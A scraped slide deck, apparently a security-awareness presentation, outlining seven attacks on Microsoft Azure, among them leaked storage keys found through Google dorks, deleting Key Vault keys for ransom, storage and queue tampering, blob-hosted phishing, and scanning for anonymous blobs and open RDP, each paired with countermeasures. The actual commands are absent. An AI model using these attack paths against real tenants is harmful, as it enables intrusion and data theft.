Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 

Recently uploaded (20)

Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 

7 Ways To Cyberattack And Hack Azure

  • 1. 7 Dangerous Ways To Cyberattack Azure By Abdul khan
  • 2. Author • Abdul Khan • IT Consultant based in Manchester, UK • Engineering Lead, Executive, Technologist, Architect • IT experience, within the private and public sectors (Retail, Banking, Digital, Insurance, M.O.D., HMRC, Aviation, Telecommunication, Housing Associations, Education, Travel, and Pharmaceutical companies). Excellent architectural and strong DevOps experience with proven-track record of delivering E2E, B2B and B2C solution on regional and global programs. • SME in specializing in providing integration, data migration, digital transformations to the cloud solutions (Azure and AWS) • Wealth of experience in global projects across EMEA, ASPAC and LATAM • Liked in profile https://www.linkedin.com/in/abdul-khan-uk/
  • 3. Accreditations Thank you to my brother, good friends and colleagues for reviewing, adding value, sharing their vast experience and knowledge. • Samad Khan (IT Manager), specialising in enterprise solution in finance and wealth Management • Steve Lampton (IT Consultant, Cloud SME) specialising in NetOps, DevOps and SecOps
  • 4. Audience Main Audience • The top cyberthreats may find a wider group of potential stakeholders who are interested in understanding the threat landscape in general or deepen their understanding to cover particular threats. • This document for decision makers, security architects, risk managers, auditors and end-users who wish to be informed about the where-about of various cyberthreats may find this material useful. Assumptions • Reader has some knowledge of cloud platforms technologies.
  • 5. Content 1.0 Think Like A Hacker 1.1 Introduction 1.2 Hacker Perspective 1.3 The Top Most Dangerous Cyberattacks 1.4 Account Storage – Architecture 1.5 Account Storage – Storage Stamp 3.0 Final Thoughts 3.1 Considerations & Best Practices 2.0 Cyberattacks and Countermeasures 2.1 Attack01 – Access using account keys 2.2 Attack02 – Ransomware attack and encryption 2.3 Attack03 – Attack VMs and Disks 2.4 Attack04 – Storage Tampering attack 2.5 Attack05 – A Phishing attack 2.6 Attack06 – Attack to Blob and resource using anonymous access 2.7 Attack07 – Attacks To The Public and Private IP Addresses in Azure
  • 6. 1.0 Think Like A Hacker…
  • 7. “everything and anything is hackable and vulnerable in some ways”
  • 8. 1.1 Introduction • Microsoft Azure offers many types of tool and technology to manage and handle threats and security. This can be from the classical firewall, encryption, network security group, MOMS, Security Centre, Audit Logging, GDPR and much more. • To identify the most important risks and threats and how to manage them we need to choose the right platform that provides the best features and tools. • In Cloud, any resources can be linked with security or related to hacking and should be assessed for vulnerabilities. Therefore, few basic questions that should always be asked :- • Is the functionality secure or vulnerable? • If yes, how can it be exploited and how much damage could it cause?
  • 9. 1.2 Hacker Perspective (1/2) • From a hacker perspective, a DNS provides very important data, this includes : • The Account name is extremely important because it is used by Azure to locate the primary storage cluster and the datacentre where the storage is located, all the requests for this account are directed to this location, an application can use a different account for different locations. • The Partition name identifies the storage node of the cluster and it is used to scale- out access to the data, the ObjectName is the specific object in the partition, the transactions are atomic and managed across the different objects inside the same PartitionName.
  • 10. 1.2 Hacker Perspective (2/2) • The Account Storage architecture has been organized to provide the maximum capacity and scaling, the let see the most important components and how it works. • The Storage Stamp is a cluster of N racks of storage nodes, and each rack is a separate fault domain, the challenge is to maintain the storage provisioned in production as highly utilized as possible if a rack reach lower then 70% the account is migrated in another rack • The Location Service manages the account namespace across all stamps and all the storage stamps, it is also responsible for disaster recovery and load balancing, the LS updates the DNS and allow the requests from the name https://AccountName.service.core.windows.net to that storage stamp’s virtual IP (VIP, an IP address the storage stamp exposes for external traffic).
  • 11. 1.3 The Top Most Dangerous Cyberattacks (1/2) • There are three most essential areas in Microsoft Azure, RBAC, Storage and Networking, everything in Azure depends on these three main pillars, and considering these areas. The 3 topmost dangerous cyberattacks, below the TOP Parade: • Privilege escalation to Azure PIM and the Global Admin Account; • Ransomware Attack; • Attack to the public and private IP addresses; • All these attacks are extremely dangerous and effective. However, the privilege escalation is the most dangerous because it can escalate a top-level, which means no more control in the entire cloud and company. • Internal attacks are much more dangerous and effective than the externals, and companies often underestimate that. Cloud is more secure than on-premise, we can rely on a much more solid infrastructure but we know cloud has weaknesses.
  • 12. 1.3 The Top Most Dangerous Cyberattacks (2/2) • RBAC is used to provide access to the storage account to a specific user. Hacker use this approach to obtain access storage accounts. This is a classic method used to manage the storage account by people through the Azure Portal. • There are 3 major areas of Azure, also these are the weak points, most critical and vulnerable areas for hackers to exploit, they are:- • Authentication and Authorization (Azure AD and RBAC), • Microsoft Azure Storage • Networks(Azure Infrastructure).
  • 13. 1.4 Account Storage - Architecture Access Blobs, Tables and Queues for Accounts Location Service DNS Front-Ends Stream Layers Stream Layers Intra-Stamp Replication Storage Stamp VIP Front-Ends Stream Layers Stream Layers Intra-Stamp Replication Storage Stamp VIP Account Management Inter-Stamp Replication https://AccountName.service.core.windows.net
  • 14. 1.5 Account Storage - Storage Stamps • The three layers in the Storage Stamps: • Stream Layer is like a distributed file system layer within the stamps, it understands files, called streams, and it manages how to store, replicate them and more but it doesn’t have any clue about the data or the semantics. • The Partition Layers manages and understands the high data abstraction layer (Blob, Table, Queues, and Files), caching objects, and storing objects on top of the streaming. • The Front-End layer manages the authentication and authorizations for the account though SAS token or Access Key, and it governs the relations between account and partitions.
  • 16. 2.1 Attack01 – Access Using Account Keys Attack • Developers use account keys everywhere, they send by email, they write in the code and often they take notes in files and there are different techniques to use. • Google Dorks are used by a hacker to collect any type of information on the internet, it is a very powerful technique, especially if used is a smart way • The query will search in all Google database for any file indexed of type config, containing the world accountkey in the web sites githup.com and sourceforge.net • The githup is not a typo, google may filter some query types, using this technique you can evade them. Countermeasures • Create Azure policy to block any unauthorize key vault creation (use a dedicated AD group/user) • Set less permission privilege to the Key Vault, monitor any access and notify by email any change • Store any sensitive information in Key Vaults and force developers on using this practice. • Execute automation source code scanning with Azure DevOps
  • 17. 2.2 Attack02 – Ransomware Attack And Encryption Attack • Azure encrypts any data in the storage account, key requirement for certifications ISO 27001, ISO 9001, GDPR and others. But Is there a real risk of a ransomware attack in the cloud?, Answer is Yes. So what can a hacker do? Answer, there is real potentially the entire storage account, all virtual machines, and disks can be encrypt. • A hacker could achieve a privilege escalation attack to the cloud or find the account keys and access to the storage account. If this is achieved, then a hacker has different choices, One quick and very dangerous attack is on the encryption keys, an attacker is able to encrypt the entire storage account. Azure uses two mechanisms to encrypt the data: • one using the internal encryption key; • and the second is using an arbitrary key created by the customer. • Attack simulation to the encryption keys, Hacker only required a basic knowledge of Storage Account and Key Vault, a hacker can :- • To execute a privilege escalation attack to Azure, (contributor access to the resource group re required) • The attacker now will delete the key from the key vault, enter the key vault and delete the key.
  • 18. 2.2 Attack02 – Ransomware Attack And Encryption Countermeasures • The best option is using policies and blocks any unauthorized usage, especially creation. • Create Azure policy to block any unauthorize key vault creation (use a dedicated AD group/user) • Set less permission privilege to the Key Vault, monitor any access and notify by email any change • Use Multi-Factor Authentication in any sensitive location of the company.
  • 19. 2.3 Attack03 – Attack VMs and Disks Attack • Another option is encrypting the content of the storage account, for example, all disks, this is a procedure that we can achieve using Powershell and remotely Countermeasures • Create Azure policy to block any unauthorize encrypting operation (use a dedicated AD group/user) • Set less permission privilege to the resources • Use Multi-Factor Authentication in any sensitive location of the company.
  • 20. 2.4 Attack04 – Storage Tampering attack Attack • This is an extremely effective and dangerous attack, the hacker found the storage account keys and will execute a scan in the account, below an example to list Blobs using Azure CLI : • The attacker has now a clear idea about the content and they may will inject in the storage account-specific malicious content. The hacker could upload malicious scripts, PDF files tampered and more. • Developers and IT administrators use the queues to execute specific infrastructure tasks and execution following a specific FIFO order, the hacker could inject messages in the queue and execute arbitrary code and script. • This Azure storage tampering is usually used in conjunction with the phishing attack.
  • 21. 2.4 Attack04 – Storage Tampering attack Countermeasures • The prevention is the best countermeasure, we must prevent access to the resource. • Create Azure policy to block any unauthorized usage (use a dedicated AD group/user) • Set less permission privilege to the storage account and to the specific resource, monitor any access and notify by email any change • Refer to Attack01 regarding the protection of the keys • Use Multi-Factor Authentication in any sensitive location of the company.
  • 22. 2.5 Attack05 – A Phishing attack Attack • This is a very used attack because able to be combined in many different combinations, the concept is very simple. • trusted web site, the attacker can send email using this URL without being intercepted or blocked, and it looks a legitimate URL. The hacker can simulate an internal communication and an employee could click on the URL and open a malicious file hosted in the blob. • This is a very simple example, in the future we will examine some nasty phishing attacks using a blob storage account. Countermeasures • Robust email security solutions are actually the best option, also filtering any email containing the windows.net domain. • Educate employees about recognizing different types of phishing attacks and avoid clicking any link. • Use multi security layers, scanning email, antivirus and use the red team to test malicious attack. • Educate everybody in the companies, also the very top management. • Use Multi-Factor Authentication in any sensitive location of the company.
  • 23. 2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access Attack • We can set the reading access type of the container and blob as anonymous. We may need to use this setting because we want to provide public access to our content, hackers use this setting for phishing attacks. • Black hats daily scan the public internet and they check the contents of these blobs by: - • Option 1 – Using Shodan - Login with a free account to Shodan.io and use the search string • Option 2 – Using scripting - This is the most productive and effective way to collect anonymous blob storages, we can use any script type technique, the concept is quite simple. • During an HTTP GET to request the anonymous blob storage responds in a different way from a private one, this is the discriminant • A program or script to created any possible combination of the account name and check for any possible public blob on the internet. The procedure is a simple representation of what criminal companies do using very high calculation power. • The program used by these companies is specifically designed to check the content and they use Artificial intelligence to quickly understand if the content can be something useful or not.
  • 24. 2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access Countermeasures • Don’t publish any sensitive information in public storage. Important Note • The usage of public blobs can be a good honey trap, criminals will be focused on that specific area of attack, you may also put false and misleading information. • The honey trap is an interesting strategy and it can be extremely effective if well planned, we can also make the criminal think what we want and discourage them from continuing any more investigation to the company.
  • 25. 2.7 Attack07 – Attacks To The Public and Private IP Addresses In Azure Attack • A public IP is attacked by a hacker after the first five minutes of life on the internet, this is a standard procedure, these people are criminal organizations looking for information to use against the company and employee. You can find public IP exposed in Azure very easily. The entire Azure infrastructure can be scanned for ay public IP’s, open RDP ports with one command : . By this hacker can download the entire Azure IP range by scanning the service, these are all public information. • Never underestimate the internal threats, if a hacker penetrates a VM, he will also have access to the internal network, at least in the subnet, and if the VM is in the domain then the escalation of the damage is not measurable, it depends by the Azure experience of the hacker. Countermeasures • Option 1 – The basic solution is avoid using public IP’s and if you really need then lock it and masquerade. • Option 2 – Control the creation of new Public IP • Option 3 – Use Azure Bastion • Option 4 – Use VPN • VPN is the best option and we avoid exposure to the internet however we still need to handle the private IPs because we can face an internal attack.
  • 27. 3.1 Considerations & Best Practices • Centralize the security control and access using a good subscription structure and firewalling appliance. • Create a Base subscription, install ExpressRoute and firewalling and propagate the connectivity to the other subscriptions, this will give you a lot of control. • Use a proper segmentation of the network and organize your IP Schemas and VNet by Regions. • Create Azure policies and force your network rules • Use Zero trust approach and limit any access • This presentation has highlights some of the most important and dangerous attacks to the Storage Account, prevention is always the best practice and in order to achieve that we need to use Azure Policies. • Azure Policies are the first line of defense, the first opportunity to stop the attack. This is what we need to achieve, we need to stop the attack from the beginning and not in the during. • the most dangerous attack always starts from the internal, we need to make our home secure from any risk. • Don’t trust anybody, even yourself, if you are not sure about something, better ask and discuss it in the team.
  • 28. - END OF DECK By Abdul Khan – https://www.linkedin.com/in/abdul-khan-uk/